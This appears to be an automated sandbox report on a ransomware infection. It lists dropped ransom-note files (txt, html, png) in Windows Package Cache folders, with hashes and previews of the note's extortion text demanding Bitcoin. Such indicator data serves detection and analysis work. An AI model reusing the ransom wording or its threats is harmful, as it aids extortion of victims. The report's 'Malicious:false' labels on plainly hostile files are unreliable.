                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
